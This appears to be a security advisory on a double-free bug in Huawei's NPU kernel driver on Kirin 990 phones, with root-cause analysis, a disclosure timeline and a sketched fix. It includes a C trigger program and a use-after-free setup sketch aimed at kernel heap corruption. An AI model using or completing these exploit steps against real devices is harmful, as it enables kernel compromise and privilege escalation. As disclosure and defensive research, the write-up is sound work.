Summary
Due to a bug in the way mappings are closed, it is possible to free a kmalloc-allocated memory chunk an arbitrary number of times. This vulnerability can be used to craft a use-after-free scenario against any kernel structure that is allocated from the kmalloc-64 cache. There is rich public literature on how such use-after-free vulnerabilities can be leveraged to compromise the kernel, achieve code execution in kernel context, and elevate the privileges of user space processes, even when modern mitigations are deployed.
The mmap handler is exposed through the /dev/davinci0 character device. Due to the applied SELinux policy, access to this device is restricted to the hiaiserver system process. Because of this restriction, a practical attack would need to target hiaiserver first.
The /dev/davinci0 device exposes an mmap handler called devdrv_npu_map (defined in drivers/hisi/npu/device/npu_devinit.c) that allocates a struct npu_vma_mmapping for each new mapping. The pointer to this structure is stored in the vma’s vm_private_data field. The handler also sets up custom vm operations for these vmas.
The main issue lies in the close operation handler npu_vm_close, which simply frees the vm_private_data pointer. This behavior is based on the assumption that mappings are always unmapped as a whole, so that the close operation is triggered only once for a given private data pointer. Unfortunately, this assumption does not always hold.
The problem is that vm_operations_struct also defines a split operation. Because this driver does not provide a custom split handler, the kernel executes only the default splitting steps whenever a split becomes necessary; there is no custom handler for the default implementation to invoke. An attacker can force such a split by mmapping multiple consecutive pages of device memory and then calling munmap on only a single page inside that region instead of the whole region.
In this case, the default behavior splits the original region’s representation and creates shallow copies of the vma for the newly split regions, meaning that all of the split regions’ vmas contain a pointer to the same vm_private_data.
Therefore, when a close operation is executed for an unmapped split, the copied pointer to the kmalloced structure is freed immediately, leaving dangling pointers to the same freed memory in the vmas of all other split regions. As a result, subsequent munmap calls on the remaining parts of the region trigger the same close handler with the same (dangling) pointer value, which by then most likely points to a reclaimed kmalloc slab allocated by other kernel code. These steps can be repeated for each page of the original mapping, triggering a kfree on the same pointer each time.
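A minimal user space trigger for the double free could look like the following sketch. It must run in a context that the SELinux policy allows to open /dev/davinci0 (i.e., as hiaiserver), and the mmap offset, size, and flags are illustrative assumptions rather than the exact parameters the driver expects.

#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void)
{
    int fd = open("/dev/davinci0", O_RDWR);
    if (fd < 0) { perror("open"); return 1; }

    long page = sysconf(_SC_PAGESIZE);

    /* One mapping spanning two pages -> one npu_vma_mmapping allocation */
    char *map = mmap(NULL, 2 * page, PROT_READ | PROT_WRITE,
                     MAP_SHARED, fd, 0);
    if (map == MAP_FAILED) { perror("mmap"); return 1; }

    /* Partial unmap: __split_vma shallow-copies vm_private_data into the
     * new vma, then npu_vm_close kfrees it (first free) */
    munmap(map, page);

    /* Unmapping the leftover page runs npu_vm_close again on the same,
     * now dangling, pointer (second free of the same chunk) */
    munmap(map + page, page);

    close(fd);
    return 0;
}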
The mappings are created by the code below, which allocates the private data:
static int devdrv_npu_map(struct file *filep, struct vm_area_struct *vma)
{
    unsigned long vm_pgoff;
    struct devdrv_proc_ctx *proc_ctx = NULL;
    struct npu_vma_mmapping *npu_vma_map = NULL;

    // ...

    // 1. npu_vma_map is allocated
    npu_vma_map = (struct npu_vma_mmapping *)kzalloc(sizeof(struct npu_vma_mmapping), GFP_KERNEL);
    COND_RETURN_ERROR(npu_vma_map == NULL, -EINVAL, "alloc npu_vma_map fail\n");

    // 2. npu_vma_map is stored in vma's private data,
    //    custom vm_ops is set up
    vma->vm_flags |= VM_DONTCOPY;
    vma->vm_ops = &npu_vm_ops;
    vma->vm_private_data = (void *)npu_vma_map;
    vma->vm_ops->open(vma);

    mutex_unlock(&proc_ctx->map_mutex);

    if (ret != 0)
        NPU_DRV_ERR("map_type = %d memory mmap failed\n", map_type);

    return ret;
}
The normal code flow is the following: the munmap syscall triggers the vm_munmap function, which calls do_munmap, which ends up calling __split_vma when unmapping a partial region. A digest of __split_vma is presented below: it calls the split handler if one is defined, creates a copy of the vma structure, calls the open handler of the new vma, and adjusts the boundaries of the vmas.
int __split_vma(struct mm_struct *mm, struct vm_area_struct *vma,
        unsigned long addr, int new_below)
{
    struct vm_area_struct *new;
    int err;

    // 1. split callback is executed if defined
    if (vma->vm_ops && vma->vm_ops->split) {
        err = vma->vm_ops->split(vma, addr);
        if (err)
            return err;
    }

    // 2. new vma allocated
    new = kmem_cache_alloc(vm_area_cachep, GFP_KERNEL);
    if (!new)
        return -ENOMEM;

    // 3. the vma is copied, including the vm_private_data field
    /* most fields are the same, copy all, and then fixup */
    *new = *vma;

    // ...

    // 4. open handler is called for the new vma
    if (new->vm_ops && new->vm_ops->open)
        new->vm_ops->open(new);

    if (new_below)
        err = vma_adjust(vma, addr, vma->vm_end, vma->vm_pgoff +
            ((addr - new->vm_start) >> PAGE_SHIFT), new);
    else
        err = vma_adjust(vma, vma->vm_start, addr, vma->vm_pgoff, new);

    /* Success. */
    if (!err)
        return 0;

    // ...
}
Once done with the splitting, do_munmap eventually calls remove_vma_list/remove_vma on the unmapped vma, which finally executes the custom close callback.
The NPU driver’s vulnerable close callback is shown below.
void npu_vm_close(struct vm_area_struct *vma)
{
    struct npu_vma_mmapping *npu_vma_map = NULL;

    // ...

    npu_vma_map = (struct npu_vma_mmapping *)vma->vm_private_data;

    // ...

    // 1. npu_vma_map is freed in the close handler
    kfree(npu_vma_map);

    // 2. this only zeroes the pointer in the copied vma
    vma->vm_private_data = NULL;
}

const struct vm_operations_struct npu_vm_ops = {
    // 3. custom split operation is not defined
    .open = npu_vm_open,
    .close = npu_vm_close,
};
The size of struct npu_vma_mmapping is 48 bytes, so it is allocated from the general kmalloc-64 cache. The repeated kfrees can be used to craft a use-after-free primitive against any kernel structure that is allocated from the same general-purpose cache, i.e., structures of at most 64 bytes that end up in kmalloc-64.
The following steps describe such a scenario (a corresponding sketch is shown after the list):
- The attacker mmaps at least two pages from /dev/davinci0
- The first page is unmapped, triggering the kfree on the original allocation
- The victim kernel structure is sprayed to reclaim the freed slot that belonged to the npu_vma_mmapping
- The second page is unmapped, triggering a kfree on the original address, which now should contain the victim structure
- The attacker sprays controlled data on the kernel heap in order to overwrite the freed victim structure, which is still in use by the kernel
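Assembled into code, the sequence could look like the hedged sketch below; spray_victim_objects and spray_controlled_data are hypothetical placeholders standing in for kmalloc-64 heap-shaping primitives (they are not driver or kernel APIs), and the mmap parameters are the same assumptions as before.

#include <sys/mman.h>

/* Hypothetical placeholders for kmalloc-64 heap-shaping primitives;
 * real implementations would use well-known spraying techniques */
static void spray_victim_objects(void)  { /* allocate victim objects */ }
static void spray_controlled_data(void) { /* spray controlled 64-byte data */ }

static int build_uaf(int fd, long page)
{
    /* One mapping, one npu_vma_mmapping allocation */
    char *map = mmap(NULL, 2 * page, PROT_READ | PROT_WRITE,
                     MAP_SHARED, fd, 0);
    if (map == MAP_FAILED)
        return -1;

    munmap(map, page);        /* 1st kfree of the npu_vma_mmapping     */
    spray_victim_objects();   /* victim object reclaims the freed slot */
    munmap(map + page, page); /* 2nd kfree now frees the live victim   */
    spray_controlled_data();  /* controlled data overwrites the victim */
    return 0;
}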
Affected Devices (Verified)
- Kirin 990
  - Huawei Mate 30 Pro (LIO)
  - Huawei P40 Pro (ELS)
  - Huawei P40 (ANA)
Fix
Huawei OTA images released after February 2021 contain the fix for the vulnerability.
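The patched driver source is not public, but one plausible shape of a fix, sketched below purely as an assumption, is to provide the previously missing split handler and refuse partial unmaps, so the single private data allocation can only ever be freed once. (An alternative would be to duplicate or reference-count the private data in the open handler.)

/* Hedged sketch, not necessarily Huawei's actual patch: rejecting the
 * split outright means an NPU vma can never be partially unmapped, so
 * npu_vm_close frees vm_private_data exactly once */
static int npu_vm_split(struct vm_area_struct *vma, unsigned long addr)
{
    return -EINVAL; /* refuse partial unmaps of NPU mappings */
}

const struct vm_operations_struct npu_vm_ops = {
    .open  = npu_vm_open,
    .close = npu_vm_close,
    .split = npu_vm_split, /* previously missing */
};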
Timeline
- 2020.10.30. Bug reported to Huawei PSIRT
- 2020.11.25. Huawei PSIRT confirms vulnerability, confirms fix plans
- 2021.01.31. OTA distribution of the fix, mitigating the vulnerability, starts
- 2021.06.09. Huawei assigns CVEs
- 2021.06.30. Huawei releases security bulletin